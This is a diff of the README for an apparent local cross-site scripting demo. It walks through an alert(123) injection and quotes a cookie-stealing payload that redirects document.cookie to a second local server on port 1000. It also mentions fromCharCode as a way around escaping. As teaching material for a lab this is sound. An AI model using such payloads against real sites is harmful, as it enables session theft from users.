Jh123x/xss-demo/README.md

 * Key in `http://localhost:5000/?num=alert(123)` into the address bar
 * An alert for 123 will appear as an alert

-In order to do something similar to the above, we cannot directly, insert `window.location=document.location='http://127.0.0.1:1000/?c='+document.cookie;` into the address bar after the query as some characters might be escaped
+In order to do something similar to the above, we cannot directly, insert `window.location=document.location='http://127.0.0.1:1000/?c='+document.cookie;` into the address bar after the query as some characters might be escaped.
+The javascript in the DOM only has access to the raw escaped query string and not the unescaped string.
+Thus, another method is required.

 In this case the `toString().constructor.fromCharCode` will be our best friend
 * Make sure both servers are up